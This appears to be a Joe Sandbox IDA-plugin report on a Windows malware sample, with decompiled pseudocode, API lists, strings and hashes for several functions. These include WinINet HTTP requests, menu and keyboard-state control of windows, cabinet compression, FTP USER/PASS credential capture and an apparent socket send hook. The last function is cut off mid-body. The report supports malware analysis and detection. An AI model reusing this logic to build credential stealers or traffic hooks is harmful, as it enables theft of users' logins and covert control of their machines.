Opcode ID: 8386d1a1ead2ed41cf0b18dbf9461066a6472dbc44a1e1b491d406b8389e860f
Instruction ID: d59451e41147f4c5e190c51915be28991543ee5088c478d3e7b857e9d363eff9
Opcode Fuzzy Hash: 8386d1a1ead2ed41cf0b18dbf9461066a6472dbc44a1e1b491d406b8389e860f
Instruction Fuzzy Hash: 4C61003192024ACFEB14EF64E898AFD3BAAEF55740F00412DEB059B291DFB18D05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012C50BC Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 169
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E012C50BC(void _a4) {
				long _v8;
				char* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				char _v26;
				short _v28;
				char* _v36;
				char* _v40;
				char _v52;
				char _v60;
				char _v544;
				char _v548;
				void* _t50;
				void* _t54;
				void* _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t66;
				void* _t85;
				void* _t89;
				char* _t93;
				void* _t95;
				void* _t96;
				void* _t114;
				intOrPtr* _t115;
				intOrPtr* _t117;
				void* _t119;

				L012B1654(_t50);
				_t115 = _a4;
				if(L012B12F8( *((intOrPtr*)(_t115 + 4)),  &_v40) == 0) {
					L22:
					return 0;
				}
				_t54 = InternetOpenA( *0x12dca04, 0, 0, 0, 0);
				_v24 = _t54;
				if(_t54 == 0) {
					L21:
					L012B11C2( &_v40);
					goto L22;
				}
				_t56 = InternetConnectA(_t54, _v40, _v28, 0, 0, 3, 0, 0);
				_v16 = _t56;
				if(_t56 == 0) {
					L20:
					InternetCloseHandle(_v24);
					goto L21;
				}
				_t58 =  *_t115;
				_t93 = "POST";
				if( *((char*)(_t58 + 0x18)) != 1) {
					_t93 = "GET";
				}
				_t59 = HttpOpenRequestA(_v16, _t93, _v36, "HTTP/1.1",  *(_t58 + 8), 0, (0 | _v26 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
				_v8 = _t59;
				if(_t59 == 0) {
					L19:
					InternetCloseHandle(_v16);
					goto L20;
				} else {
					L012B11AE( &_v548);
					_t95 = 0xf;
					L012B165E(_t95,  &_v60);
					_t63 =  *_t115;
					if( *((intOrPtr*)( *_t115 + 0x20)) > 0) {
						_t85 = L012B128F( &_v12,  &_v60,  *((intOrPtr*)(_t63 + 0x1c)));
						_t119 = _t119 + 0xc;
						if(_t85 > 0) {
							HttpAddRequestHeadersA(_v8, _v12, 0xffffffff, 0xa0000000);
							L012B1933(_v12);
						}
					}
					_t96 = 0x10;
					L012B165E(_t96,  &_v52);
					_t66 = L012B11D6( &_v544, L012B18B6( &_v544));
					_v20 = _t66;
					if(_t66 != 0 && L012B128F( &_v12,  &_v52, _t66) > 0) {
						HttpAddRequestHeadersA(_v8, _v12, 0xffffffff, 0xa0000000);
						L012B1933(_v12);
					}
					L012B1933(_v20);
					_t117 = _a4;
					_t89 = _v8;
					if(HttpSendRequestA(_t89, 0, 0,  *( *_t117 + 0x24),  *( *_t117 + 0x28)) != 1) {
						L18:
						InternetCloseHandle(_t89);
						goto L19;
					} else {
						_v8 = 4;
						_a4 = 0;
						if(HttpQueryInfoA(_t89, 0x20000013,  &_a4,  &_v8, 0) != 1 || _a4 != 0xc8) {
							goto L18;
						} else {
							_push( &_v8);
							_t114 = 0x22;
							if(L012B10F0(_t89, _t114) != 0) {
								L012B1933(_t75);
							}
							L012B11C2( &_v40);
							 *(_t117 + 8) = _t89;
							goto L22;
						}
					}
				}
			}

0x012c50ca
0x012c50cf
0x012c50df
0x012c52a9
0x012c52ad
0x012c52ad
0x012c50f1
0x012c50f7
0x012c50fc
0x012c529f
0x012c52a2
0x00000000
0x012c52a2
0x012c510f
0x012c5115
0x012c511a
0x012c5296
0x012c5299
0x00000000
0x012c5299
0x012c5120
0x012c5126
0x012c512b
0x012c512d
0x012c512d
0x012c515a
0x012c5160
0x012c5165
0x012c528d
0x012c5290
0x00000000
0x012c516b
0x012c5171
0x012c517b
0x012c517c
0x012c5181
0x012c5191
0x012c519e
0x012c51a3
0x012c51a8
0x012c51b3
0x012c51b8
0x012c51b8
0x012c51a8
0x012c51c2
0x012c51c3
0x012c51db
0x012c51e0
0x012c51e5
0x012c5205
0x012c520a
0x012c520a
0x012c5212
0x012c5217
0x012c521f
0x012c5231
0x012c5286
0x012c5287
0x00000000
0x012c5233
0x012c5242
0x012c5249
0x012c5255
0x00000000
0x012c5260
0x012c5263
0x012c5266
0x012c5270
0x012c5274
0x012c5274
0x012c527c
0x012c5281
0x00000000
0x012c5281
0x012c5255
0x012c5231

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 012C50F1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 012C510F
HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 012C515A
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 012C51B3
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 012C5205
HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 012C5228
HttpQueryInfoA.WININET(?,20000013,?,?,00000000), ref: 012C524C
InternetCloseHandle.WININET(?), ref: 012C5287
InternetCloseHandle.WININET(?), ref: 012C5290
InternetCloseHandle.WININET(?), ref: 012C5299

Strings

HTTP/1.1, xrefs: 012C514E
GET, xrefs: 012C512D, 012C5156
POST, xrefs: 012C5126

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: HttpInternet$Request$CloseHandle$HeadersOpen$ConnectInfoQuerySend
String ID: GET$HTTP/1.1$POST
API String ID: 585491181-2753618334
Opcode ID: e23d1a1db9fce710a3186ed0a84a7c0fabb7d3229b3a7bfd801881708de18395
Instruction ID: b339ee10d29b51a45b1463114e01e9c55fd8da53762dd2961dc4845f96ecc63b
Opcode Fuzzy Hash: e23d1a1db9fce710a3186ed0a84a7c0fabb7d3229b3a7bfd801881708de18395
Instruction Fuzzy Hash: 0D51CC71A1111ABFDB20EBA0ED88DEEBFBAFF14790F104155F605A6154DB30EA50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012CF213 Relevance: 22.6, APIs: 15, Instructions: 131
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E012CF213(unsigned int __ecx, struct HWND__* _a4, signed short _a8) {
				signed int _v8;
				signed int _v12;
				struct tagRECT _v28;
				signed short _t37;
				int _t46;
				BYTE* _t47;
				signed short _t51;
				int _t63;
				int _t64;
				unsigned int _t65;
				struct HMENU__* _t72;
				struct HMENU__* _t76;
				void* _t79;

				_t65 = __ecx;
				_t37 = _a8;
				_t79 = _t37 - 0xfffffffd;
				if(_t79 == 0) {
					SetKeyboardState( *0x12dd848);
					L23:
					SetEvent( *0x12dd844);
					return 0;
				}
				if(_t79 <= 0 || _t37 > 0xffffffff) {
					_v28.top = _t37 >> 0x10;
					_v28.right = _t65 & 0x0000ffff;
					_push(0);
					_v28.left = _t37 & 0x0000ffff;
					_v28.bottom = _t65 >> 0x10;
					_push( &_v28);
					L012B1663(0x12dd838, _a4);
					goto L23;
				} else {
					_t72 = GetMenu(_a4);
					if(_t72 == 0) {
						goto L23;
					}
					_v12 = _v12 | 0xffffffff;
					_t46 = GetMenuItemCount(_t72);
					_t63 = 0;
					_v8 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x12dd848;
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t72, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v8 = GetMenuState(_t72, _t64, 0x400);
						if(_v12 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t72, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v8 & 0x00000003) == 0) {
							if((_v8 & 0x00000010) == 0) {
								if((_v8 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t72, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t76 = GetSubMenu(_t72, _t64);
							if(_t76 != 0 && GetMenuItemRect(_a4, _t72, _t64,  &_v28) != 0) {
								TrackPopupMenuEx(_t76, 0x4000, _v28, _v28.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t72, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t72, _t63, 0x400);
							_v12 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v8);
					goto L8;
				}
			}

0x012cf213
0x012cf216
0x012cf21f
0x012cf222
0x012cf391
0x012cf397
0x012cf39d
0x012cf3a9
0x012cf3a9
0x012cf228
0x012cf364
0x012cf36d
0x012cf370
0x012cf375
0x012cf37b
0x012cf37e
0x012cf384
0x00000000
0x012cf237
0x012cf240
0x012cf244
0x00000000
0x00000000
0x012cf24a
0x012cf24f
0x012cf255
0x012cf257
0x012cf261
0x012cf285
0x012cf285
0x012cf28a
0x012cf2a0
0x012cf2a5
0x00000000
0x00000000
0x012cf2b4
0x012cf2ba
0x012cf2bc
0x012cf2bc
0x012cf2cc
0x012cf2d6
0x012cf2ea
0x012cf335
0x012cf33d
0x012cf346
0x00000000
0x00000000
0x012cf348
0x012cf356
0x00000000
0x012cf356
0x012cf337
0x00000000
0x012cf337
0x012cf2f4
0x012cf2f8
0x012cf326
0x012cf326
0x012cf2f8
0x00000000
0x00000000
0x00000000
0x00000000
0x012cf263
0x012cf263
0x012cf26e
0x012cf276
0x012cf27c
0x012cf27c
0x012cf27f
0x012cf280
0x00000000
0x012cf263

APIs

GetMenu.USER32(?), ref: 012CF23A
GetMenuItemCount.USER32 ref: 012CF24F
GetMenuState.USER32 ref: 012CF266
HiliteMenuItem.USER32(000000FF,00000000,00000000,00000400), ref: 012CF276
MenuItemFromPoint.USER32(000000FF,00000000,?,?), ref: 012CF29A
GetMenuState.USER32 ref: 012CF2AE
EndMenu.USER32 ref: 012CF2BC
HiliteMenuItem.USER32(000000FF,00000000,00000000,00000480), ref: 012CF2CC
GetSubMenu.USER32 ref: 012CF2EE
GetMenuItemRect.USER32(000000FF,00000000,00000000,?), ref: 012CF307
TrackPopupMenuEx.USER32(00000000,00004000,?,000000FE,000000FF,00000000), ref: 012CF326
GetMenuItemID.USER32(00000000,00000000), ref: 012CF33D
SendMessageW.USER32(000000FF,00000111,?,00000000), ref: 012CF356
SetKeyboardState.USER32 ref: 012CF391
SetEvent.KERNEL32 ref: 012CF39D

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: d53b2d8a1b6b19561ed7eaeaa786b0275065150ba085fe4c87fea5bdb67341cb
Instruction ID: 876d4073d5332bfde3697c12674c35e61c0e34987bc242330568a70de18be483
Opcode Fuzzy Hash: d53b2d8a1b6b19561ed7eaeaa786b0275065150ba085fe4c87fea5bdb67341cb
Instruction Fuzzy Hash: 09418234811249BFDB214F68EE4DABE3EBAEB45B65F148218FB55D31D4C7308A42DB60

Uniqueness

Uniqueness Score: -1.00%

Function 012B78EC Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012B78EC() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t18;

				_t14 =  *0x12dc358; // 0x0
				if(_t14 != 0) {
					L9:
					 *0x12dc358 =  *0x12dc358 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x12dc354 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x12db97c = GetProcAddress(_t2, "FCICreate");
						 *0x12dc344 = GetProcAddress( *0x12dc354, "FCIAddFile");
						 *0x12db574 = GetProcAddress( *0x12dc354, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x12dc354, "FCIDestroy");
						 *0x12dc34c = _t7;
						_t16 =  *0x12db97c; // 0x0
						if(_t16 == 0) {
							L7:
							FreeLibrary( *0x12dc354);
							goto L8;
						} else {
							_t17 =  *0x12dc344; // 0x0
							if(_t17 == 0) {
								goto L7;
							} else {
								_t18 =  *0x12db574; // 0x0
								if(_t18 == 0 || _t7 == 0) {
									goto L7;
								} else {
									_t9 = HeapCreate(0, 0x80000, 0);
									 *0x12db570 = _t9;
									if(_t9 != 0) {
										goto L9;
									} else {
										goto L7;
									}
								}
							}
						}
					}
				}
			}

0x012b78ef
0x012b78f5
0x012b79a0
0x012b79a0
0x012b79a9
0x012b78fb
0x012b7900
0x012b7906
0x012b790d
0x012b799c
0x012b799f
0x012b7913
0x012b792d
0x012b793f
0x012b7951
0x012b7956
0x012b7958
0x012b795e
0x012b7964
0x012b7990
0x012b7996
0x00000000
0x012b7966
0x012b7966
0x012b796c
0x00000000
0x012b796e
0x012b796e
0x012b7974
0x00000000
0x012b797a
0x012b7981
0x012b7987
0x012b798e
0x00000000
0x00000000
0x00000000
0x00000000
0x012b798e
0x012b7974
0x012b796c
0x012b7964
0x012b790d

APIs

LoadLibraryA.KERNEL32(cabinet.dll,?,012BC7AE), ref: 012B7900
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 012B7920
GetProcAddress.KERNEL32(FCIAddFile), ref: 012B7932
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 012B7944
GetProcAddress.KERNEL32(FCIDestroy), ref: 012B7956
HeapCreate.KERNEL32(00000000,00080000,00000000,?,012BC7AE), ref: 012B7981
FreeLibrary.KERNEL32(?,012BC7AE), ref: 012B7996

Strings

cabinet.dll, xrefs: 012B78FB
FCIFlushCabinet, xrefs: 012B7934
FCIAddFile, xrefs: 012B7922
FCIDestroy, xrefs: 012B7946
FCICreate, xrefs: 012B791A

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: 4c332c532f65f9729faa8573fb4e13c0b47300f495f624fe9852bebf73d32add
Instruction ID: 83414180bce6c7d3ad76d6abf859a4718cbe55c439510a7b8a30238f7a17c180
Opcode Fuzzy Hash: 4c332c532f65f9729faa8573fb4e13c0b47300f495f624fe9852bebf73d32add
Instruction Fuzzy Hash: D6115B30D63B11EAEB725F3DFD4D5A93FA4E789B50359052EE6109224CDE350095CF41

Uniqueness

Uniqueness Score: -1.00%

Function 012C4060 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E012C4060(void* __eax, char* __ecx) {
				intOrPtr _t39;
				void* _t46;
				char _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				void* _t69;
				intOrPtr _t71;
				signed char _t72;
				intOrPtr _t73;
				void* _t75;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t89;
				char* _t91;
				char _t93;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				void* _t101;

				_t99 = _t101 - 0x74;
				_t69 = __eax;
				_t91 = __ecx;
				if( *((intOrPtr*)(_t99 + 0x7c)) == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t39 = 0;
				} else {
					if(__eax <= 6) {
						L24:
						if(_t69 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x12dd050);
							_t96 = E012C3F58( *((intOrPtr*)(_t99 + 0x7c)));
							if(_t96 != 0) {
								if( *((intOrPtr*)(_t96 + 4)) == 0 ||  *((intOrPtr*)(_t96 + 8)) == 0) {
									_push(0);
									goto L49;
								} else {
									if(_t69 < 3) {
										L33:
										if(_t69 >= 4) {
											_t93 =  *_t91;
											if(_t93 == 0x45505954 || _t93 == 0x54414546 || _t93 == 0x56534150) {
												goto L37;
											} else {
												if(_t93 == 0x54415453 || _t93 == 0x5453494c) {
													_t72 = 0x65;
													_push(0x16);
													goto L41;
												}
											}
										}
									} else {
										_t57 =  *_t91;
										if(_t57 == 0x43 || _t57 == 0x50) {
											if( *((char*)(_t91 + 1)) != 0x57 ||  *((char*)(_t91 + 2)) != 0x44) {
												goto L33;
											} else {
												L37:
												_t72 = 0x64;
												_push(0x15);
												L41:
												_pop(_t75);
												L012B1479(_t75, _t99 + 0x60);
												_t46 = _t99 - 0x40;
												 *((intOrPtr*)(_t99 + 0x6c)) = 0x80;
												__imp__#5( *((intOrPtr*)(_t99 + 0x7c)), _t46, _t99 + 0x6c);
												if(_t46 == 0 && L012B15DC(_t99 - 0x40) == 0) {
													if(_t72 == 0x65) {
														L46:
														L012B1A55(_t99 - 0x40, _t99 - 0x248);
														_t78 = 0x14;
														L012B1479(_t78, _t99 + 0x40);
														_push(_t99 - 0x248);
														_push( *((intOrPtr*)(_t96 + 8)));
														_push( *((intOrPtr*)(_t96 + 4)));
														L012B171C(_t72 & 0x000000ff, 0, 0, _t99 + 0x40, _t99 + 0x60);
													} else {
														if(_t72 == 0x64) {
															_t79 = 0x17;
															if(L012B1AA5(L012B1479(_t79, _t99 + 0x48),  *((intOrPtr*)(_t96 + 4)), _t99 + 0x48, 0xffffffff, 9) != 0) {
																goto L46;
															}
														}
													}
												}
												_push(0);
												L49:
												E012C3FF9(_t96);
											}
										} else {
											goto L33;
										}
									}
								}
							}
							_t71 = 0;
							goto L23;
						}
					} else {
						_t58 =  *((intOrPtr*)(__ecx));
						if(_t58 == 0x52455355 || _t58 == 0x53534150) {
							if( *((char*)(_t91 + 4)) != 0x20) {
								goto L24;
							} else {
								_t97 = _t69 - 5;
								_t89 = 0;
								_t81 = _t91 + 5;
								if(_t97 == 0) {
									goto L51;
								} else {
									while(1) {
										_t59 =  *((intOrPtr*)(_t89 + _t81));
										if(_t59 == 0xd || _t59 == 0xa) {
											break;
										}
										if(_t59 < 0x20) {
											goto L51;
										} else {
											_t89 = _t89 + 1;
											if(_t89 < _t97) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t89 == 0 || _t89 == _t97) {
										goto L51;
									} else {
										_t73 = L012B1140(_t81, _t89);
										if(_t73 == 0) {
											goto L51;
										} else {
											 *((char*)(_t99 + 0x73)) = 0;
											EnterCriticalSection(0x12dd050);
											_t98 = E012C3F58( *((intOrPtr*)(_t99 + 0x7c)));
											if(_t98 != 0) {
												L18:
												 *((char*)(_t99 + 0x73)) = 1;
												if( *_t91 != 0x55) {
													L012B1933( *((intOrPtr*)(_t98 + 8)));
													 *((intOrPtr*)(_t98 + 8)) = _t73;
												} else {
													E012C3FF9(_t98, 1);
													 *((intOrPtr*)(_t98 + 4)) = _t73;
												}
												 *_t98 =  *((intOrPtr*)(_t99 + 0x7c));
											} else {
												_t98 = E012C3F91( *((intOrPtr*)(_t99 + 0x7c)));
												if(_t98 != 0) {
													goto L18;
												} else {
													L012B1933(_t73);
												}
											}
											_t71 =  *((intOrPtr*)(_t99 + 0x73));
											L23:
											LeaveCriticalSection(0x12dd050);
											_t39 = _t71;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t39;
			}

0x012c4061
0x012c4072
0x012c4074
0x012c4076
0x012c42ae
0x012c42ae
0x012c4090
0x012c4093
0x012c416e
0x012c4171
0x00000000
0x012c4177
0x012c417c
0x012c418a
0x012c4190
0x012c4199
0x012c429f
0x00000000
0x012c41a8
0x012c41ab
0x012c41c3
0x012c41c6
0x012c41cc
0x012c41d4
0x00000000
0x012c41ec
0x012c41f2
0x012c4200
0x012c4202
0x00000000
0x012c4202
0x012c41f2
0x012c41d4
0x012c41ad
0x012c41ad
0x012c41b1
0x012c41bb
0x00000000
0x012c41e6
0x012c41e6
0x012c41e6
0x012c41e8
0x012c4204
0x012c4207
0x012c4208
0x012c4211
0x012c4218
0x012c421f
0x012c4227
0x012c4238
0x012c425d
0x012c4266
0x012c4270
0x012c4271
0x012c427c
0x012c427d
0x012c4283
0x012c4293
0x012c423a
0x012c423d
0x012c4244
0x012c425b
0x00000000
0x00000000
0x012c425b
0x012c423d
0x012c4238
0x012c429b
0x012c42a0
0x012c42a2
0x012c42a2
0x00000000
0x00000000
0x00000000
0x012c41b1
0x012c41ab
0x012c4199
0x012c42a7
0x00000000
0x012c42a7
0x012c4099
0x012c4099
0x012c40a0
0x012c40b1
0x00000000
0x012c40b7
0x012c40b7
0x012c40ba
0x012c40bc
0x012c40c1
0x00000000
0x012c40c7
0x012c40c7
0x012c40c7
0x012c40cc
0x00000000
0x00000000
0x012c40d4
0x00000000
0x012c40da
0x012c40da
0x012c40dd
0x00000000
0x00000000
0x00000000
0x00000000
0x012c40dd
0x00000000
0x012c40d4
0x012c40e1
0x00000000
0x012c40ef
0x012c40f4
0x012c40f8
0x00000000
0x012c40fe
0x012c4103
0x012c4107
0x012c4115
0x012c4119
0x012c4132
0x012c4135
0x012c4139
0x012c414c
0x012c4151
0x012c413b
0x012c413f
0x012c4144
0x012c4144
0x012c4157
0x012c411b
0x012c4123
0x012c4127
0x00000000
0x012c4129
0x012c412b
0x012c412b
0x012c4127
0x012c4159
0x012c415c
0x012c4161
0x012c4167
0x012c4167
0x012c40f8
0x012c40e1
0x012c40c1
0x00000000
0x00000000
0x00000000
0x012c40a0
0x012c4093
0x012c42b0
0x012c42b7

APIs

EnterCriticalSection.KERNEL32(012DD050), ref: 012C4107
LeaveCriticalSection.KERNEL32(012DD050,000000FF), ref: 012C4161
EnterCriticalSection.KERNEL32(012DD050), ref: 012C417C
getpeername.WS2_32(000000FF,?,?), ref: 012C421F

Strings

STAT, xrefs: 012C41EC
USER, xrefs: 012C409B
PASS, xrefs: 012C40A2
TYPE, xrefs: 012C41CE
PASV, xrefs: 012C41DE
LIST, xrefs: 012C41F4
FEAT, xrefs: 012C41D6

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CriticalSection$Enter$Leavegetpeername
String ID: FEAT$LIST$PASS$PASV$STAT$TYPE$USER
API String ID: 1099368488-1452479446
Opcode ID: c2ad7fd8076994906a13415a9cc8090e580ae54ba6288029cf5d88d9618c47a7
Instruction ID: 379bb1993550bac34e8f97651036f007f0e0c178b6703d6b0db04dd1f04fa255
Opcode Fuzzy Hash: c2ad7fd8076994906a13415a9cc8090e580ae54ba6288029cf5d88d9618c47a7
Instruction Fuzzy Hash: 735139316B02CB8AEF31AA68D8A57EF7BA2AB51F00F14871EDBA447091D771D445C742

Uniqueness

Uniqueness Score: -1.00%

Function 012C72D8 Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E012C72D8(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v92;
				void* __esi;
				signed int _t112;
				signed int _t113;
				signed int _t115;
				void* _t117;
				signed int _t121;
				signed int _t123;
				signed int _t126;
				signed int _t129;
				signed char _t130;
				signed char _t135;
				intOrPtr _t146;
				signed int _t161;
				void* _t169;
				void* _t191;
				intOrPtr _t192;
				signed int _t201;
				void* _t203;
				void* _t205;
				signed int _t214;

				if(L012B150A() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					return  *0x12dd2d4(_a4, _a8, _a12);
				} else {
					EnterCriticalSection(0x12dd2e4);
					_t207 = _a4;
					_t201 = E012C63A9(_a4);
					_v16 = _t201;
					if(_t201 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x12dd2e4);
						goto L9;
					}
					_t203 = _t201 * 0x38 +  *0x12dd300;
					if( *((intOrPtr*)(_t203 + 0x20)) > 0) {
						L30:
						_t112 =  *(_t203 + 0x24);
						_t205 =  *((intOrPtr*)(_t203 + 0x20)) - _t112;
						LeaveCriticalSection(0x12dd2e4);
						_t210 = _a4;
						_t113 =  *0x12dd2d4(_a4,  *(_t203 + 0x1c) + _t112, _t205);
						_v8 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							EnterCriticalSection(0x12dd2e4);
							_t115 = E012C63A9(_t210);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t161 = _v8;
								_t117 = _t115 * 0x38 +  *0x12dd300;
								__eflags = _t161 - _t205;
								if(_t161 != _t205) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t161;
									_t90 = _t117 + 0x28;
									 *_t90 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t90;
									_v8 = 1;
								} else {
									_t86 = _t117 + 0x1c; // -19780324
									_t211 = _t86;
									_v8 =  *(_t117 + 0x28);
									L012B1933( *_t86);
									_t191 = 0x10;
									L012B19F6(_t211, _t191);
								}
							} else {
								_v8 = _v8 | _t115;
								 *0x12dd2e0(0xffffe890, 8);
							}
							LeaveCriticalSection(0x12dd2e4);
						}
						return _v8;
					}
					if( *(_t203 + 8) > 0) {
						L39:
						LeaveCriticalSection(0x12dd2e4);
						_t212 = _a4;
						_t121 =  *0x12dd2d4(_a4, _a8, _a12);
						_v12 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x12dd2e4);
							_t123 = E012C63A9(_t212);
							__eflags = _t123 - 0xffffffff;
							if(_t123 != 0xffffffff) {
								_t169 = _t123 * 0x38 +  *0x12dd300;
								_t192 =  *((intOrPtr*)(_t169 + 8));
								__eflags = _v12 - _t192;
								if(_v12 > _t192) {
									E012C6467(_t123);
								} else {
									 *((intOrPtr*)(_t169 + 8)) = _t192 - _v12;
								}
							} else {
								_v12 = _v12 | _t123;
								 *0x12dd2e0(0xffffe890, 8);
